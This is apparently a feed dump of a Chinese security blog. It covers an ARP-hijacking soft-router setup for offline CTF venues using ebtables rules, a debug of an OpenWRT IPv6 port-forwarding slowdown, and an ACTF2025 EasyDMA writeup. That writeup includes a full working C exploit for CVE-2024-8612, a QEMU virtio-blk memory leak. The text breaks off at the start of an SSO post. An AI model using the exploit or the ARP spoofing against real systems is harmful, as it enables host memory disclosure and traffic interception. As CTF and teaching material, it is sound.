张清越 菜狗 2025-11-14T08:20:36.943Z https://zqy.ink/ 张清越 Hexo 记赛场网络代理配置 https://zqy.ink/2025/11/13/arena-network-configuration/ 2025-11-13T14:00:00.000Z 2025-11-14T08:20:36.943Z 背景

众所周知在一些线下赛中,允许选手连接外网,然而赛场网络并不提供互联网连接。在这种场景下,每位选手通常需要连接手机热点,然后通过配置路由表的方式同时连接外网和平台/靶机。然而,路由表的配置较为繁琐(Windows/Linux/Mac OS下配置的方式不同),并且容易出差错。例如以下三种情况:

  1. 路由漏配错配导致无法连接靶机,然而可以正常连接平台/外网,造成迷惑
  2. 一些网络服务会不断添加错误的默认路由,使得无法正常连接外网
  3. 假如赛中出现网络断连(网线松了/热点断了等等),则部分路由会消失,需要重新配置

此外,使用手机热点也可能遇到5G信号不佳、Wifi信道干扰的问题。这些不稳定的问题,使得在赛场需要随机应变的网络配置,也为搭建代理带来了很大挑战。因此,我们迫切地需要一种易于配置、“一劳永逸”的方案,其中最显而易见的就是加入一个软路由小主机,通过小主机统一连接合适的外网出口(简单来说就是看赛场四个人手机谁信号好用谁的x),并统一配置路由表。

方案

为了方便展示方案,我们在这里需要为软路由划分三个网络:

WAN1(赛场网络):174.35.1.0/24 网关174.35.1.254

是的,这个段属于公网段,想知道为什么要用这个段可以去问问赛宁为什么喜欢这么配网

WAN2(公网):192.168.5.0/24 网关192.168.5.1

LAN(选手网络,在没有软路由时,WAN1和LAN是同一个网络)

方案一:NAT

说到软路由,第一想法就是通过NAT访问赛场网络:

LAN:192.168.8.0/24

在软路由上为LAN配置DHCP服务,选手的主机全部连接LAN即可

然而,这样做有两个问题:

  1. 在渗透等场景下,例如反弹shell,需要靶机反向连接选手主机。因为选手主机在NAT后,除非手动配置端口转发,否则无法反向连接
  2. 尽管设想选手可以全部连接软路由的LAN,但假如出现LAN口不够等情况,选手被迫直连现场网络时,同样除非手动配置端口转发,否则无法连接到LAN后的设备

那么,软路由上不使用NAT,直接和选手主机一同连入赛场网络怎么样呢?

方案二:修改网关

回想我们的需求,我们的目标只是让选手的流量流经软路由,而不是共用一个IP地址。因此,我们完全不需要引入NAT,甚至不需要选手连接软路由的LAN,而是直接在选手主机上设置网关为软路由自身IP即可。在软路由上设置转发规则,从而完成流量的路由操作。

这是个理想的方案,并且在最近的线下比赛中我们也是这么做的,但完美主义发作的我还是鸡蛋里挑骨头发现了两个问题:

  1. 在选手主机配置中,只有两种IP配置方法:DHCP或静态IP。因此在实际操作时,为了避免撞IP,我们都是先走DHCP拿到IP后,再设为静态IP,地址为DHCP获取到的IP,网关为软路由IP。这引入了不一致性,并且在DHCP租约过期时依然可能会出现问题
  2. 尽管选手需要配置的内容已经大大减少,但这仍然需要选手手动配置,而我们希望透明地实现网络代理与流量路由

如何使得选手仍然依赖赛场DHCP,却能将流量导向软路由并完成分流呢?最直接的办法是修改由WAN到LAN的DHCP响应包,并修改其中的Option 3。然而由于DHCP的复杂性(这可是一个应用层协议),并没有一个简单、稳定的方案实现这一点。此时,我的队友提出了一个绝妙的想法

方案三:劫持ARP

既然不便劫持DHCP报文,我们能否劫持更简单、更底层的ARP报文呢?答案是可行的!我们只需要拦截由WAN流向LAN的赛场网关ARP响应报文。当LAN中有主机通过ARP协议寻找网关时,我们伪造一个响应,使得MAC指向软路由自身即可

实现

假设WAN1, WAN2, LAN分别对应ens18, ens19, ens20三个网络接口

配置系统

首先需要开启系统的ipv4转发功能

1
2
sysctl -w net.ipv4.ip_forward=1
# 持久化需要修改/etc/sysctl.conf

然后将WAN1和LAN连接到一个虚拟网桥(此处使用netplan)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
network:
  version: 2
  ethernets:
    ens18:
      dhcp4: no
    ens19:
      dhcp4: yes
    ens20:
      dhcp4: no
  bridges:
    br0:
      dhcp4: yes
      interfaces:
        - ens18
        - ens20

配置路由

此处比较简单,删除赛场网络的默认路由,并配置靶机路由,配置ens19的masquerade等,就不过多赘述了

1
2
ip route del default via 174.35.1.254
# ...

劫持ARP

当ens20发出arp请求包时,判断其请求的目的ip地址,若为网关地址则响应一个指向虚拟网桥br0的MAC

当ens18发出arp响应包流向ens20时,检查其源ip,若为网关地址,则丢弃

1
2
3
BR0_MAC=$(cat /sys/class/net/br0/address)
ebtables -t nat -A PREROUTING -i ens20 -p arp --arp-op Request --arp-ip-dst 174.35.1.254 -j arpreply --arpreply-mac $BR0_MAC --arpreply-target DROP
ebtables -A FORWARD -i ens18 -o ens20 -p arp --arp-op Reply --arp-ip-src 174.35.1.254 -j DROP

总结

通过这样的配置,我们成功在赛场网络中加入了一个透明的路由器。配置完成软路由后,选手无需手动配置路由表和IP地址,只需要连接到软路由的LAN即可在信息高速路上冲浪

而劫持ARP的方案实现起来并不繁琐,完全可以手写一个自动配置脚本完成配置,从而降低了配网的难度,允许在赛场网络环境中快速、有效、稳定地配置网络

而为了实现这一切,我们最少只需要额外带一台双网口小主机即可:LAN口借用赛场提供的交换机,而WAN2使用手机的NDIS通过USB完成网络共享,并没有额外引入太多配件。假如小主机只有一个网口,也可以额外带一台VLAN交换机,不过这就有些太显眼了。

]]> 本文又名如何增加自己在线下赛中的不可取代性 记一次网络迁移的经历 https://zqy.ink/2025/05/14/network-migration/ 2025-05-14T10:00:00.000Z 2025-11-14T08:20:36.935Z 背景

长久以来,我们战队的服务器通过PVE Host连接BUPT-Mobile联网,并且使用nftables做IPv4 NAT+端口转发的方式为网桥上的VM提供网络。

image1.drawio

然而,我们遇到了两个需求

  1. 希望为内网的VM提供公网IPv6
  2. 考虑后认为还是需要一个专职网关

我们的IPv6是通过SLAAC拿到一个/64的地址,因此需求1可以通过RA Relay和NDP Relay完成,不过折腾很久未果后,还是决定更换一个更好配置的网关:OpenWRT

迁移

因为配置工作比较繁琐+平时比较忙,因此我们首要面临的挑战就是:怎么在尽可能避免服务中断的情况下,进行OpenWRT的配置。好在我们有两张无线网卡,我们将闲置的无线网卡直通进OpenWRT (VM100),可以在配置好OpenWRT后,再将其作为其他VM在vmbr0上的网关。

image2.drawio

这样有以下几个优点:

  1. OpenWRT安装时可以通过PVE Host联网,从而安装必须的无线网卡驱动等软件包
  2. 保持了原先的IPv4网络拓扑,发生配置错误也不会影响其他VM
  3. 使VM连接了IPv6网络,可以通过OpenWRT连接外网IPv6测试配置是否正确
  4. 可以通过将VM的网关设为10.0.0.100的方式测试OpenWRT的IPv4配置

同时,在两个无线接口没有同时产生大流量时,也不会有明显的干扰现象。

待OpenWRT配置完毕后,我们更改OpenWRT的IP为10.0.0.1,PVE Host的IP为10.0.0.2,并屏蔽PVE Host的无线接口,从而使OpenWRT无缝替代原先的网关发挥作用。同时,通过DDNS的方式使得域名指向正确的IP。

image3.drawio

问题解决

然而,在测试过程中,我们发现在使用OpenWRT nftables的IPv6端口转发功能时,出现了明显的掉速现象,并且同时影响了上传和下载。通过使用Tcpdump在OpenWRT的WAN接口(phy0-sta0)抓包,我们发现了大规模的TCP重传,并且几乎每次重传一定对应一个长度大于MTU (1500)的帧

image4

我们首先怀疑是链路上MTU设置不当造成的,我们复查了链路上每个节点的MTU,发现均设置无误;同时,我们打开了OpenWRT的MSS Clamping功能,但没有效果。经过查询,我们发现大于MTU的帧被称为Jumbo Frame,是提升网络性能的特性,属于正常现象。并且我们对比了正常的IPv6传输流量(不经过端口转发),发现也有很大的Jumbo Frame,因此排除MTU设置不当的问题。

接下来,我们仔细分析数据包,发现了一点端倪

image5

注意到WAN口首先接收到了帧长度为8246bytes的TCP包,TCP Payload长度为8172,Seq为130753;然后接收到了帧长度为1436bytes的TCP包,Seq为138925;接下来系统却返回了Dup ACK请求重传,Ack编号为130753+1362=132115,同时SLE=138925表明后一个包被正常接收。由此我们可以判断,在WAN口接收到包并端口转发到LAN口上的VM时,链路上有节点拆了帧,将8172bytes的TCP Payload拆成了以一个1362bytes payload包开头的若干个包,其中第一份payload被正常接收,而后面的payload被丢包或拒绝

查询资料后,我们首先怀疑是虚拟化网卡的bug,并使用ethtool禁用掉了虚拟网卡的gso, tso, lro等offload,然后在LAN口抓包,发现了匪夷所思的一幕

image6

LAN口分明接收到了长度正常的帧,Seq为43488,却还是请求了43488的重传,这意味着这个数据包可能本身有问题。这时我们才想起打开WireShark的TCP Checksum Validation,结果让我们茅塞顿开

image-20250426020136251

每次重传一定对应一个checksum错误的包,但是我们分明已经关掉虚拟网卡上几乎所有的offload了呀。这时,我们将目光转移到了硬件网卡上。对刚才WAN口抓的包启用TCP Checksum Validation,发现网卡接收到的包同样存在checksum错误的问题。因此,我们关闭了无线网卡上可以关掉的offload,发现关闭GRO (Generic Receive Offload)后,问题得到了解决。

]]> 我是小猫,听到丢包就会哈气的那种 ACTF2025-EasyDMA Writeup https://zqy.ink/2025/04/28/easydma/ 2025-04-28T04:00:00.000Z 2025-11-14T08:20:36.875Z EasyDMA Writeup

从qemu的启动参数中可以发现程序添加了两个设备:virtio-blk-pcireadflag,其中前者是qemu自带的设备,后者显然是添加的设备,先分析后者

readflag的逻辑和qemu自己的edu.c基本完全一致,mmio read/write有一个8字节的存取,没有漏洞。同时,mmio write有一个malloc buffer, read flag into buffer, free buffer的操作,可以推测需要结合information leak类的漏洞完成利用。同时,检查flag文件,发现并不只是flag,前面有Congratulations等字符串占位,所以不需要考虑ptmalloc的链表结构会破坏flag内容的情况。

mmio write当size=4, addr=0, val=0时会出现不可控的堆溢出,无法利用,排除。

接下来以virtio-blk, dma, information leak为关键词搜索可以发现CVE-2024-8612,题目的qemu版本显然在影响范围中。

CVE-2024-8612

在VirtIO virtqueue处理的过程中,会为descriptor描述的DMA buffer映射内存,调用dma_memory_map->address_space_map,在address_space_map中如果!memory_acess_is_direct条件成立,即DMA地址为MMIO地址等情况,就会使用bounce buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/* Unmaps a memory region previously mapped by address_space_map().
 * Will also mark the memory as dirty if is_write is true.  access_len gives
 * the amount of memory that was actually read or written by the caller.
 */
void address_space_unmap(AddressSpace *as, void *buffer, hwaddr len,
                         bool is_write, hwaddr access_len)
{
    if (buffer != bounce.buffer) {
        MemoryRegion *mr;
        ram_addr_t addr1;

        mr = memory_region_from_host(buffer, &addr1);
        assert(mr != NULL);
        if (is_write) {
            invalidate_and_set_dirty(mr, addr1, access_len);
        }
        if (xen_enabled()) {
            xen_invalidate_map_cache_entry(buffer);
        }
        memory_region_unref(mr);
        return;
    }
    if (is_write) {
        address_space_write(as, bounce.addr, MEMTXATTRS_UNSPECIFIED,
                            bounce.buffer, access_len);
    }
    qemu_vfree(bounce.buffer);
    bounce.buffer = NULL;
    memory_region_unref(bounce.mr);
    /* Clear in_use before reading map_client_list.  */
    qatomic_mb_set(&bounce.in_use, false);
    cpu_notify_map_clients();
}

注意到bounce buffer的来源是qemu_memalign,得到的内存并没有初始化为0,因此必须严格限制长度的合法性,避免读取到未初始化数据

然而,注意到当blk request不合法时,会出现req长度已经被记录,却没有对应长度的数据写入的情况

virtio_blk_handle_request函数中,设置了req->in_len,然而当type不合法时,会直接调用virtio_blk_req_complete完成这个请求(并向状态寄存器设置状态提示错误),将这个请求push到used ring中,导致dma memory的写回和unmap

调用链:virtio_blk_handle_request->virtio_blk_req_complete->virtqueue_push->virtqueue_fill->virtqueue_unmap_sg->dma_memory_unmap->address_space_unmap->address_space_write

同时,virtio-blk的mmio部分缺少重入保护,导致未初始化的数据可以被写到common registers的部分。其中有若干字节的部分是可以存储数据并再次被驱动读出的。

攻击思路

通过长度从大到小的堆喷,我们可以将flag字符串分散在内存页的各个部分,并通过CVE-2024-8612泄露出部分的flag内容。通过多次执行exp,我们可以拼凑出最终的flag

与VirtIO交互时,我们采用最简单的办法:使用modern virtio的方式,向PCI BAR上的mmio地址读写。feature协商时不需要任何feature,并只协商一条queue。并且我们在exp开始时先重置设备,保证了我们的exp可以在同一环境中反复多次运行

题目没有给出内核的配置文件也没有kernel module,要通过映射/dev/mem的方式拿到物理内存

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
#include<stddef.h>
#include<stdlib.h>
#include<unistd.h>
#include<fcntl.h>
#include<sys/mman.h>
#include<string.h>
#include<stdio.h>
#include<assert.h>
#include<stdint.h>
#include<sys/io.h>
#include<linux/stddef.h>

#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define u64 uint64_t
#define le16 u16
#define le32 u32
#define le64 u64

struct virtio_pci_cap {
    u8 cap_vndr;
    u8 cap_next;
    u8 cap_len;
    u8 cfg_type;
    u8 bar;
    u8 id;
    u8 padding[2];
    le32 offset;
    le32 length;
};

struct virtio_pci_common_cfg {
    /* About the whole device. */
    le32 device_feature_select; /* read-write */
    le32 device_feature; /* read-only for driver */
    le32 driver_feature_select; /* read-write */
    le32 driver_feature; /* read-write */
    le16 config_msix_vector; /* read-write */
    le16 num_queues; /* read-only for driver */
    u8 device_status; /* read-write */
    u8 config_generation; /* read-only for driver */
    /* About a specific virtqueue. */
    le16 queue_select; /* read-write */
    le16 queue_size; /* read-write */
    le16 queue_msix_vector; /* read-write */
    le16 queue_enable; /* read-write */
    le16 queue_notify_off; /* read-only for driver */
    le64 queue_desc; /* read-write */
    le64 queue_driver; /* read-write */
    le64 queue_device; /* read-write */
    le16 queue_notify_data; /* read-only for driver */
    le16 queue_reset; /* read-write */
};

struct virtio_notify_cfg {
    struct virtio_pci_cap cap;
    le32 notify_off_multiplier;
};

struct virtio_blk_config{
    le64 capacity;
    le32 size_max;
    le32 seg_max;
    struct virtio_blk_geometry {
        le16 cylinders;
        u8 heads;
        u8 sectors;
    } geometry;
    le32 blk_size;
    struct virtio_blk_topology {
        // # of logical blocks per physical block (log2)
        u8 physical_block_exp;
        // offset of first aligned logical block
        u8 alignment_offset;
        // suggested minimum I/O size in blocks
        le16 min_io_size;
        // optimal (suggested maximum) I/O size in blocks
        le32 opt_io_size;
    } topology;
    u8 writeback;
    u8 unused0;
    u16 num_queues;
    le32 max_discard_sectors;
    le32 max_discard_seg;
    le32 discard_sector_alignment;
    le32 max_write_zeroes_sectors;
    le32 max_write_zeroes_seg;
    u8 write_zeroes_may_unmap;
    u8 unused1[3];
    le32 max_secure_erase_sectors;
    le32 max_secure_erase_seg;
    le32 secure_erase_sector_alignment;
};

enum virtio_pci_cfg_type{
    VIRTIO_PCI_CAP_COMMON_CFG = 0x1,
    VIRTIO_PCI_CAP_NOTIFY_CFG = 0x2,
    VIRTIO_PCI_CAP_ISR_CFG = 0x3,
    VIRTIO_PCI_CAP_DEVICE_CFG = 0x4,
    VIRTIO_PCI_CAP_PCI_CFG = 0x5,
    VIRTIO_PCI_CAP_SHARED_MEMORY = 0x8,
    VIRTIO_PCI_CAP_VENDOR_CFG = 0x9,
};

/* Feature bits */
#define VIRTIO_BLK_F_SIZE_MAX1/* Indicates maximum segment size */
#define VIRTIO_BLK_F_SEG_MAX2/* Indicates maximum # of segments */
#define VIRTIO_BLK_F_GEOMETRY4/* Legacy geometry available  */
#define VIRTIO_BLK_F_RO5/* Disk is read-only */
#define VIRTIO_BLK_F_BLK_SIZE6/* Block size of disk is available*/
#define VIRTIO_BLK_F_FLUSH9/* Flush command supported */
#define VIRTIO_BLK_F_TOPOLOGY10/* Topology information is available */
#define VIRTIO_BLK_F_MQ12/* support more than one vq */
#define VIRTIO_BLK_F_DISCARD13/* DISCARD is supported */
#define VIRTIO_BLK_F_WRITE_ZEROES14/* WRITE ZEROES is supported */
#define VIRTIO_BLK_F_SECURE_ERASE16 /* Secure Erase is supported */

/* Status byte for guest to report progress, and synchronize features. */
/* We have seen device and processed generic fields (VIRTIO_CONFIG_F_VIRTIO) */
#define VIRTIO_CONFIG_S_ACKNOWLEDGE1
/* We have found a driver for the device. */
#define VIRTIO_CONFIG_S_DRIVER2
/* Driver has used its parts of the config, and is happy */
#define VIRTIO_CONFIG_S_DRIVER_OK4
/* Driver has finished configuring features */
#define VIRTIO_CONFIG_S_FEATURES_OK8
/* Device entered invalid state, driver must reset it */
#define VIRTIO_CONFIG_S_NEEDS_RESET0x40
/* We've given up on this device. */
#define VIRTIO_CONFIG_S_FAILED0x80

#define VIRTIO_QUEUE_SIZE 0x10

struct virtq_desc {
    /* Address (guest-physical). */
    le64 addr;
    /* Length. */
    le32 len;
/* This marks a buffer as continuing via the next field. */
#define VIRTQ_DESC_F_NEXT 1
/* This marks a buffer as device write-only (otherwise device read-only). */
#define VIRTQ_DESC_F_WRITE 2
/* This means the buffer contains a list of buffer descriptors. */
#define VIRTQ_DESC_F_INDIRECT 4
    /* The flags as indicated above. */
    le16 flags;
    /* Next field if flags & NEXT */
    le16 next;
};

struct virtq_avail {
#define VIRTQ_AVAIL_F_NO_INTERRUPT 1
    le16 flags;
    le16 idx;
    le16 ring[VIRTIO_QUEUE_SIZE];
    le16 used_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtq_used_elem {
    /* Index of start of used descriptor chain. */
    le32 id;

    /*
    * The number of bytes written into the device writable portion of
    * the buffer described by the descriptor chain.
    */
    le32 len;
};

struct virtq_used {
#define VIRTQ_USED_F_NO_NOTIFY 1
    le16 flags;
    le16 idx;
    struct virtq_used_elem ring[VIRTIO_QUEUE_SIZE];
    le16 avail_event; /* Only if VIRTIO_F_EVENT_IDX */
};

struct virtio_blk_req {
    le32 type;
    le32 reserved;
    le64 sector;
    u8 data[0];
    // u8 status;
};

#define VIRTIO_BLK_T_IN 0
#define VIRTIO_BLK_T_OUT 1
#define VIRTIO_BLK_T_FLUSH 4
#define VIRTIO_BLK_T_GET_ID 8
#define VIRTIO_BLK_T_GET_LIFETIME 10
#define VIRTIO_BLK_T_DISCARD 11
#define VIRTIO_BLK_T_WRITE_ZEROES 13
#define VIRTIO_BLK_T_SECURE_ERASE 14


void print_cap(struct virtio_pci_cap* cap){
    printf("cap_len: %x\n", cap->cap_len);
    switch(cap->cfg_type){
        case VIRTIO_PCI_CAP_COMMON_CFG:
            printf("cfg_type: common\n");
            break;
        case VIRTIO_PCI_CAP_NOTIFY_CFG:
            printf("cfg_type: notify\n");
            break;
        case VIRTIO_PCI_CAP_ISR_CFG:
            printf("cfg_type: isr\n");
            break;
        case VIRTIO_PCI_CAP_DEVICE_CFG:
            printf("cfg_type: device\n");
            break;
        case VIRTIO_PCI_CAP_PCI_CFG:
            printf("cfg_type: pci\n");
            break;
        case VIRTIO_PCI_CAP_SHARED_MEMORY:
            printf("cfg_type: shared memory\n");
            break;
        case VIRTIO_PCI_CAP_VENDOR_CFG:
            printf("cfg_type: vendor\n");
            break;
        default:
            printf("cfg_type: unknown\n");
            break;
    }
    printf("bar: %x\n", cap->bar);
    printf("id: %x\n", cap->id);
    printf("offset: %x\n", cap->offset);
    printf("length: %x\n", cap->length);
}

void ERR(const char* buf){
    perror(buf);
    abort();
}

void LOG(const char* buf){
    write(2, buf, strlen(buf));
}

volatile char* readflag_mmio = NULL;
volatile char* virtio_mmio = NULL;
volatile char* virtio_common_mmio = NULL;
volatile struct virtio_notify_cfg* virtio_notify_mmio = NULL;
volatile char* virtio_isr_mmio = NULL;
volatile char* virtio_device_mmio = NULL;
volatile char* dma_mem = NULL;
volatile char* dma_data = NULL;
volatile struct virtq_desc* queue_desc = NULL;
volatile struct virtq_avail* queue_avail = NULL;
volatile struct virtq_used* queue_used = NULL;

void init_readflag(){
    int mmio_fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC);
    if(mmio_fd < 0){
        ERR("Open readflag");
    }
    readflag_mmio = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);
    if(readflag_mmio == (volatile void*)-1){
        ERR("mmap mmio_mem");
    }
    close(mmio_fd);

    puts("readflag init done");
}

uint8_t mmio_read8(void* addr){
    return *(volatile uint8_t*)addr;
}

uint16_t mmio_read16(void* addr){
    return *(volatile uint16_t*)addr;
}

uint32_t mmio_read32(void* addr){
    return *(volatile uint32_t*)addr;
}

uint64_t mmio_read64(void* addr){
    return *(volatile uint64_t*)addr;
}

void mmio_write8(void* addr, uint8_t val){
    *(volatile uint8_t*)addr = val;
}

void mmio_write16(void* addr, uint16_t val){
    *(volatile uint16_t*)addr = val;
}

void mmio_write32(void* addr, uint32_t val){
    *(volatile uint32_t*)addr = val;
}

void mmio_write64(void* addr, uint64_t val){
    *(volatile uint64_t*)addr = val;
}

void mb(){
    asm volatile("mfence":::"memory");
}

void init_virtio() {
    int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
    if(fd < 0){
        ERR("Open virtio config");
    }
    struct virtio_pci_cap cap;
    char* config = malloc(0x1000);
    int bytes_read = read(fd, config, 0x1000);
    if(bytes_read < 0){
        ERR("Read virtio config");
    }

    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
    if(fd < 0){
        ERR("Open virtio resource4");
    }
    virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(virtio_mmio == (volatile void*)-1){
        ERR("mmap virtio mem");
    }
    close(fd);

    u8 cap_ptr = *(u8*)(config+0x34);
    while(cap_ptr != 0){
        if(config[cap_ptr] != 0x9){
            cap_ptr = *(u8*)(config+cap_ptr+1);
            continue;
        }
        memcpy(&cap, config+cap_ptr, sizeof(cap));
        print_cap(&cap);
        switch(cap.cfg_type){
            case VIRTIO_PCI_CAP_COMMON_CFG:
                virtio_common_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_NOTIFY_CFG:
                virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
                break;
            case VIRTIO_PCI_CAP_ISR_CFG:
                virtio_isr_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_DEVICE_CFG:
                virtio_device_mmio = virtio_mmio + cap.offset;
                break;
            default:
                break;
        }       
        cap_ptr = cap.cap_next;
    }
    close(fd);
    free(config);

    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    mmio_write32(&common_cfg->device_feature_select, 0);
    printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->device_feature_select, 1);
    printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->driver_feature_select, 0);
    printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
    mmio_write32(&common_cfg->driver_feature_select, 1);
    printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

    struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
    printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
    printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
    printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
    printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
    printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
    printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
    printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

    // reset device
    mmio_write8(&common_cfg->device_status, 0);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write32(&common_cfg->driver_feature_select, 0);
    mmio_write32(&common_cfg->driver_feature, 0); // disable all features
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);


    // alloc dma memory
    int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if(dma_fd < 0){
        ERR("Open dma");
    }
    dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
    if(dma_mem == (volatile void*)-1){
        ERR("mmap dma mem");
    }
    *(volatile uint32_t*)dma_mem = 0x12345678;
    printf("%x\n", *(volatile uint32_t*)dma_mem);
    *(volatile uint32_t*)dma_mem = 0;
    printf("dma_mem: %p\n", dma_mem);
    dma_data = dma_mem + 0x1000;
    queue_desc = (struct virtq_desc*)dma_mem;
    queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
    queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);
    
    // init queue
    mmio_write16(&common_cfg->queue_select, 0);
    mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
    mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
    mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
    mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
    mmio_write16(&common_cfg->queue_enable, 1);

    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    puts("virtio init done");
}

void spray(){
    for(int i = 0xfff; i > 0x28; i-=4){
        mmio_write32((void*)readflag_mmio, i);
    }
}

void hexdump(void* addr, size_t size){
    // dump 4 bytes per time
    for(int i = 0; i < size; i+=4){
        uint32_t val = *(volatile uint32_t*)(addr+i);
        for(int j = 0; j < 4; j++){
            uint8_t chr = (val >> (j*8)) & 0xff;
            if(chr >= 0x20 && chr <= 0x7e){
                putchar(chr);
            }else{
                putchar('?');
            }
        }
    }
}

int main(){
    setbuf(stdout, NULL);
    init_readflag();
    init_virtio();

    volatile struct virtio_blk_req* req = (struct virtio_blk_req*)dma_data;
    req->type = 0xffffffffu;
    req->sector = 0;
    req->reserved = 0;

    queue_desc[0].addr = (size_t)req;
    queue_desc[0].len = 0x10;
    queue_desc[0].flags = VIRTQ_DESC_F_NEXT;
    queue_desc[0].next = 1;
    queue_desc[1].addr = (size_t)0xfe000000;
    queue_desc[1].len = 0xfff;
    queue_desc[1].flags = VIRTQ_DESC_F_WRITE | VIRTQ_DESC_F_NEXT;
    queue_desc[1].next = 2;
    queue_desc[2].addr = (size_t)dma_data + 0xa00;
    queue_desc[2].len = 1;
    queue_desc[2].flags = VIRTQ_DESC_F_WRITE;
    queue_desc[2].next = 0;
    
    queue_avail->flags = 1;
    queue_avail->ring[0] = 0;
    queue_avail->idx = 1;
    mb();
    mmio_write8((void*)virtio_isr_mmio, 1);
    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    void* notify_addr = (void*)((uintptr_t)virtio_notify_mmio + mmio_read32((void*)&virtio_notify_mmio->cap.offset) + mmio_read16(&common_cfg->queue_notify_off) * mmio_read32((void*)&virtio_notify_mmio->notify_off_multiplier));
    puts("--------------------------------");
    for(int i = 0; i < 0x100; i+=4){
        spray();
    }
    mmio_write16(notify_addr, 0);
    puts("--------------------------------");
    hexdump((char*)virtio_common_mmio + 0x000, 0x100);
    
    munmap(dma_mem, 0x3000);
    munmap(virtio_mmio, 0x4000);
    munmap(readflag_mmio, 0x1000);
}

]]> 赛中做出来的第一道qemu题 记一次authentik配置debug的心路历程 https://zqy.ink/2024/10/10/authentik-debug/ 2024-10-10T07:15:00.000Z 2025-11-14T08:20:36.931Z 一切开始之前

随着队伍内部的服务越来越多(对外:Outline, wiki, hedgedoc, 以及之后可能会有的网盘服务;对内:PVE, Portainer, …),我们越来越觉得需要一个SSO服务,使用户使用一个账户就可以访问这些服务。同时,由于我们的用户包含校内和校外的同学,也需要进一步做权限管理。

